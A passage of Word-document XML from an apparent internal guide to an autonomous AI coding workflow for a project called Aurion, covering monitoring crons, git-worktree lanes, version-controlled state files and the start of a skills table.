        <w:t>└──────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ↑                                              ↓</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │              ┌──────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │              │  Monitor cron (every 30 min, 06:00-22:00)│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │              │  • CI status of open PRs                 │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │              │  • Sentry new issues                     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │              │  • AWS dev CloudWatch alarms             │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │              │  • Appends to .claude/state/alerts.md    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │              └──────────────────────────────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │                                              ↓</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>┌──────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│  Daily digest cron (18:00 weekdays)                              │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│  → writes digests/YYYY-MM-DD.md                                  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│  → posts ~200-word summary to Linear                             │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>└──────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The driver owns implementation. The monitor is read-only and nudges the driver only via a sentinel file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>alerts.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) when something needs attention. This split means a wedged driver doesn't blind your monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. Parallel lanes via worktrees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-form parallelism via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>git worktree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so non-overlapping backlog items can ship simultaneously without branch-switching or build-artifact collision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Layout</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~/Documents/GitHub/Aurion/      ← main checkout, always at origin/main</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  State files (.claude/state/*) live here.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~/aurion-lanes/backend/         ← worktree for the backend lane</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  Branch: lane-backend/{task-id}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  Touches: backend/**, infrastructure/**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~/aurion-lanes/ios/             ← worktree for the iOS lane</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  Branch: lane-ios/{task-id}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  Touches: ios/**, demo/**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Create with:</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git worktree add ~/aurion-lanes/backend -b lane-backend/init</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>git worktree add ~/aurion-lanes/ios     -b lane-ios/init</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lane assignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Backlog items carry a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>lane:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag:</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Active</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] P0-04 Alembic migrations — 8d — lane: backend</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] P0-06 Persistent users + admin refactor — 8d — lane: backend</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] M-07-DASH Dashboard Stage 2 tile — 3d — lane: ios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>/next-task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> filters by the running loop's lane. A vertical slice that spans both gets tagged with the lane of the bigger change and stays sequential within that lane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>When NOT to parallelize</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vertical slices (backend endpoint + iOS client + migration in one go).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The first 2–3 PRs after the workflow is built — run sequential while the loop's rough edges surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Anything touching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>CLAUDE.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>AURION-CODING-WORKFLOW.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, or backlog structure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5. Memory &amp; state</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>State that must survive across sessions lives in version-controlled files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`.claude/state/backlog.md`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The canonical task list. The loop reads top-to-bottom and works the topmost Active item matching its lane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`.claude/state/alerts.md`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Append-only file the monitor writes. Each tick begins by reading this and handling new alerts before picking the next task.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`.claude/state/in-flight.json`</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "backend": {"task_id": "P0-04", "branch": "lane-backend/p0-04",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              "pr": 42, "started_at": "2026-05-15T09:14:00Z"},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "ios":     {"task_id": null}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`memory/autonomous_authority.md`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Auto-memory entry that captures the authority boundaries so future sessions don't have to re-ask. Indexed in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>memory/MEMORY.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6. Skills</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Invocable via the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>Skill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool. Each is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>.claude/skills/&lt;name&gt;/SKILL.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with frontmatter + instructions.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Skill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/next-task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
